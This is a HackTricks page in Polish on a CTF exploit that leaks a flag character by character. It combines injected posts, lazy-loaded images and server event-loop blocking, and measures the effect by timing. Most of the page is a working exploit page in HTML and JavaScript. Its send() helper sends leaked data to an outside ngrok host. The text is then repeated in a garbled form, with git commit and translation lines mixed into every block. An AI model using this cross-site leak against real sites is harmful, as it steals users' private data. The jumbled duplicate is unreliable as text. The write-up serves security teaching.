hacktricks/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md

# Event Loop Blocking + Lazy images

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

W [**tym exploicie**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) łączy technikę **lazy image side channel** poprzez wstrzyknięcie HTML z rodzajem **event loop blocking technique** do wycieku znaków.

To jest **inny exploit dla wyzwania CTF**, które zostało już skomentowane na następującej stronie. Zobacz więcej informacji na temat wyzwania:

{% content-ref url="connection-pool-example.md" %}
[connection-pool-example.md](connection-pool-example.md)
{% endcontent-ref %}

Pomysł stojący za tym exploitem to:

* Posty są ładowane alfabetycznie
* **Napastnik** może **wstrzyknąć** **post** zaczynający się od **"A"**, wtedy jakiś **tag HTML** (jak duży **`<canvas`**) wypełni większość **ekranu** i kilka końcowych **`<img lazy` tags** do załadowania rzeczy.
* Jeśli zamiast "A" **napastnik wstrzyknie ten sam post, ale zaczynający się od "z".** **Post** z **flagą** pojawi się **pierwszy**, potem **wstrzyknięty** **post** pojawi się z początkowym "z" i **dużym** **canvas**. Ponieważ post z flagą pojawił się pierwszy, pierwszy canvas zajmie cały ekran, a końcowe **`<img lazy`** tagi wstrzyknięte **nie będą widoczne** na ekranie, więc **nie będą załadowane**.
* Następnie, **podczas** gdy bot **uzyskuje dostęp** do strony, **napastnik** będzie **wysyłał zapytania fetch**.&#x20;
* Jeśli **obrazy** wstrzyknięte w poście są **ładowane**, te **zapytania fetch** będą trwały **dłużej**, więc napastnik wie, że **post jest przed flagą** (alfabetycznie).
* Jeśli **zapytania fetch** są **szybkie**, oznacza to, że **post** jest **alfabetycznie** **po** fladze.

Sprawdźmy kod:
```html
<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>

<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>

<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>

<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'

const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')

// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1

// I have omited code here as apparently it wasn't necesary

// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}

}, 0)

async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()

setTimeout(() => {
run(str, resolve)
}, 500)
})
}

async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}

let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)

/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}

// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}

</script>
</body>
</html>
```
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Wsparcie HackTricks</summary>

* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.

</details>
{% endhint %}
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`# Event Loop Blocking + Lazy images`

			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
			`<details>`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`<summary>Support HackTricks</summary>`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`{% endhint %}`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`W [tym exploicie](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [@aszx87410](https://twitter.com/aszx87410) łączy technikę lazy image side channel poprzez wstrzyknięcie HTML z rodzajem event loop blocking technique do wycieku znaków.`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`To jest inny exploit dla wyzwania CTF, które zostało już skomentowane na następującej stronie. Zobacz więcej informacji na temat wyzwania:`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
			`{% content-ref url="connection-pool-example.md" %}`
			`[connection-pool-example.md](connection-pool-example.md)`
			`{% endcontent-ref %}`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`Pomysł stojący za tym exploitem to:`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`* Posty są ładowane alfabetycznie`
			* Napastnik może wstrzyknąć post zaczynający się od "A", wtedy jakiś tag HTML (jak duży `<canvas`) wypełni większość ekranu i kilka końcowych `<img lazy` tags do załadowania rzeczy.
			* Jeśli zamiast "A" napastnik wstrzyknie ten sam post, ale zaczynający się od "z". Post z flagą pojawi się pierwszy, potem wstrzyknięty post pojawi się z początkowym "z" i dużym canvas. Ponieważ post z flagą pojawił się pierwszy, pierwszy canvas zajmie cały ekran, a końcowe `<img lazy` tagi wstrzyknięte nie będą widoczne na ekranie, więc nie będą załadowane.
			`* Następnie, podczas gdy bot uzyskuje dostęp do strony, napastnik będzie wysyłał zapytania fetch. `
			`* Jeśli obrazy wstrzyknięte w poście są ładowane, te zapytania fetch będą trwały dłużej, więc napastnik wie, że post jest przed flagą (alfabetycznie).`
			`* Jeśli zapytania fetch są szybkie, oznacza to, że post jest alfabetycznie po fladze.`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
Translated to Polish 2024-02-11 01:46:25 +00:00			`Sprawdźmy kod:`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00			```html
			`<!DOCTYPE html>`
			`<html>`
			`<!--`
Translated to Polish 2024-02-11 01:46:25 +00:00			`The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.`
			`If images are loading, the request to "/" is slower, otherwise faster.`
			`By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.`
			`We can use fetch to measure the request time.`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00			`-->`
			`<body>`
Translated to Polish 2024-02-11 01:46:25 +00:00			`<button onclick="run()">start</button>`

			`<!-- Inject post with payload -->`
			`<form id=f action="http://localhost:1234/create" method="POST" target="_blank">`
			`<input id=inp name="text" value="">`
			`</form>`

			`<!-- Remove index -->`
			`<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">`
			`<input id=inp2 name="index" value="">`
			`</form>`

			`<script>`
			`let flag = 'SEKAI{'`
			`const TARGET = 'https://safelist.ctf.sekai.team'`
			`f.action = TARGET + '/create'`
			`f2.action = TARGET + '/remove'`

			`const sleep = ms => new Promise(r => setTimeout(r, ms))`
			`// Function to leak info to attacker`
			`const send = data => fetch('http://server.ngrok.io?d='+data)`
			`const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')`

			`// start exploit`
			`let count = 0`
			`setTimeout(async () => {`
			`let L = 0`
			`let R = charset.length - 1`

			`// I have omited code here as apparently it wasn't necesary`

			`// fallback to linerar since I am not familiar with binary search lol`
			`for(let i=R; i>=L; i--) {`
			`let c = charset[i]`
			`send('try_' + flag + c)`
			`const found = await testChar(flag + c)`
			`if (found) {`
			`send('found: '+ flag+c)`
			`flag += c`
			`break`
			`}`
			`}`

			`}, 0)`

			`async function testChar(str) {`
			`return new Promise(resolve => {`
			`/*`
			`For 3350, you need to test it on your local to get this number.`
			`The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold`
			`If starts with "A", the image should be loaded because it's in the threshold.`
			`*/`
			`// <canvas height="3350px"> is experimental and allow to show the injected`
			`// images when the post injected is the first one but to hide them when`
			`// the injected post is after the post with the flag`
			inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
			`f.submit()`

			`setTimeout(() => {`
			`run(str, resolve)`
			`}, 500)`
			`})`
			`}`

			`async function run(str, resolve) {`
			`// Open posts page 5 times`
			`for(let i=1; i<=5;i++) {`
			`window.open(TARGET)`
			`}`

			`let t = 0`
			`const round = 30 //Lets time 30 requests`
			`setTimeout(async () => {`
			`// Send 30 requests and time each`
			`for(let i=0; i<round; i++) {`
			`let s = performance.now()`
			`await fetch(TARGET + '/?test', {`
			`mode: 'no-cors'`
			`}).catch(err=>1)`
			`let end = performance.now()`
			`t += end - s`
			`console.log(end - s)`
			`}`
			`const avg = t/round`
			`// Send info about how much time it took`
			`send(str + "," + t + "," + "avg:" + avg)`

			`/*`
			`I get this threshold(1000ms) by trying multiple times on remote admin bot`
			`for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold`
			`*/`
			`const isFound = (t >= 1000)`
			`if (isFound) {`
			`inp2.value = "0"`
			`} else {`
			`inp2.value = "1"`
			`}`

			`// remember to delete the post to not break our leak oracle`
			`f2.submit()`
			`setTimeout(() => {`
			`resolve(isFound)`
			`}, 200)`
			`}, 200)`
			`}`

			`</script>`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00			`</body>`
			`</html>`
			```
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`{% hint style="success" %}`
			`Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00			`<details>`

Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`<summary>Wsparcie HackTricks</summary>`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`* Sprawdź [plany subskrypcyjne](https://github.com/sponsors/carlospolop)!`
			`* Dołącz do 💬 [grupy Discord](https://discord.gg/hRep4RUj7f) lub [grupy telegramowej](https://t.me/peass) lub śledź nas na Twitterze 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Dziel się trikami hackingowymi, przesyłając PR-y do [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.`
GitBook: [#3600] No subject 2022-10-12 19:31:39 +00:00
			`</details>`
Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie 2024-07-19 04:55:16 +00:00			`{% endhint %}`
No results found.